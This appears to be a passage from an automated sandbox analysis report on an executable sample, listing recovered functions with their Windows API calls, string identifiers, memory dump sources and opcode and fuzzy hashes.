                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                  • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                  • API String ID: 3052893215-2127371420
                                                                                                                  • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                  • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                  • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                  • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                                  APIs
                                                                                                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                  • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                                  • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                                  • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                  • API String ID: 2295938435-2354261254
                                                                                                                  • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                  • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                  • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                  • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                                                  • API String ID: 3038501623-2263619337
                                                                                                                  • Opcode ID: 39ae298fc181d5d42c06b47df995865edf9e31aa6caf51efdd07e97f5c8a5ecf
                                                                                                                  • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                                  • Opcode Fuzzy Hash: 39ae298fc181d5d42c06b47df995865edf9e31aa6caf51efdd07e97f5c8a5ecf
                                                                                                                  • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                                  APIs
                                                                                                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                  • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                                  • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                                  • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                  • API String ID: 2295938435-8599901
                                                                                                                  • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                  • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                                  • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                  • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                                  APIs
                                                                                                                  • timeGetTime.WINMM ref: 00443B67
                                                                                                                    • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                                  • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                                  • IsWindow.USER32(?), ref: 00443C3A
                                                                                                                  • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                  • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                                  • String ID: BUTTON
                                                                                                                  • API String ID: 1834419854-3405671355
                                                                                                                  • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                  • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                                  • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                  • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                  • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • _wprintf.LIBCMT ref: 00454074
                                                                                                                  • __swprintf.LIBCMT ref: 004540A3
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                  • API String ID: 455036304-4153970271
                                                                                                                  • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                  • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                  • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                  • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                  APIs
                                                                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                                  • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                                  • _memmove.LIBCMT ref: 00467EB8
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                                  • _memmove.LIBCMT ref: 00467F6C
                                                                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2170234536-0
                                                                                                                  • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                                  • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                                  • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                                  • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                                  • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 541375521-0
                                                                                                                  • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                  • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                                  • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                  • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                                  • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                                  • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3096461208-0
                                                                                                                  • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                  • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                                  • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                  • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                                  • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                                  • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                                  • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                                  • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                                  • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                                  • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                                  • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                                  • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                                  • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3218148540-0
                                                                                                                  • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                  • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                                  • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                  • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 136442275-0
                                                                                                                  • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                  • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                                  • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                  • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                                  APIs
                                                                                                                  • _wcsncpy.LIBCMT ref: 00467490
                                                                                                                  • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                  • _wcstok.LIBCMT ref: 004674FF
                                                                                                                    • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                  • _wcstok.LIBCMT ref: 004675B2
                                                                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                  • _wcslen.LIBCMT ref: 00467793
                                                                                                                  • _wcscpy.LIBCMT ref: 00467641
                                                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                  • _wcslen.LIBCMT ref: 004677BD
                                                                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                    • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                  • String ID: X
                                                                                                                  • API String ID: 3104067586-3081909835
                                                                                                                  • Opcode ID: 389f486f2d99b0acbbe2e832d5b999096831549b6c3d6258d1ea0558c1299e51
                                                                                                                  • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
